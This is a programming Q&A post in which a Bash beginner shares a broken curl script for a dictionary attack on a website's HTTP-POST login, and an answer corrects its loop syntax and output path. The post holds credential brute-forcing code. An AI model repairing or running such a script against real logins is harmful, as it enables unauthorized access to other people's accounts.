# Dictionary attack in Bash with cURL

Tags: security, bash-scripting, curl, dictionary, brute-force

I'm fairly new to Bash, but this is a script I've been working on for the past few days. It's meant to run a dictionary attack on an HTTP-POST login for a website, by reading the time module and sending a login request to said website every amount of seconds I set it to. However, I'm running into issues.

```
echo -e "Initiating password cracking session...\n"
echo -e "Seconds per password attempt: \c"

read TIME

if [ "$TIME" -lt "2" ];
then
echo -e "Servers may block out attempts when initiated too frequently,     cracking session will begin anyways.\n"
fi

if [ "$TIME" -gt "2" ];
then
echo -e "Cracking session will take too long to initiate. Session will     continue anyways.\n"
fi

function control_c {
tput setaf 2; echo -en "                                                                Password     cracking session deactivated.\n"
exit $?
}

trap control_c SIGINT

for (( ; ; ))
do
url="https://examplewebsite.com/login"
echo -e "Username: \c"

read user

echo -e "Wordlist: \c"

read pass

for user do
  for pass in pass do
    http_code=$(curl -L -data user="$user" -data password="$pass" "$url" -w '%{http_code}' -o /root/Desktop -s)
    if [[ $http_code -eq 302 ]]; then
      echo "Success: User: '$user' Pass: '$pass'"
      break 2
    fi
 done
sleep $TIME
done
done
```

As a side note, I have absolutely zero knowledge with cURL, and the syntax relating to cURL above is purely that which I've read on other websites. I get the error message: 
    syntax error near unexpected token `http_code=$(curl -L -data user="$user" -data password="$pass" "$url" -w '%{http_code}' -o /root/Desktop -s)'
./jmc.sh: line 36:`    http_code=$(curl -L -data user="$user" -data password="$pass" "$url" -w '%{http_code}' -o /root/Desktop -s)'

What is it that I'm doing wrong? Once again, I'm new to both Bash and cURL, so please forgive me if my script seems to be way out of line.

Answer (score 0):

To be short, I intentionally don't  mention (many) things you "should" or "shouldn't", just focus on the syntax error.

- for user do: **for** in this context must be in the format of **for**
  loop_*variable* **in** *list*; **do** (although I can't see what you
  would wish to have a loop for here)
- for pass in pass do: just as in the previous line, the semicolon is
  missing (or, if you don't like semicolons, you can write **do** in
  the next line (but I can't see reasons of a loop here either)

One thing I must mention in addition: **-o /root/Desktop** would mean "put the output into a file called **/root/Desktop**". I guess you already have a directory with this name, so you must give the file something different..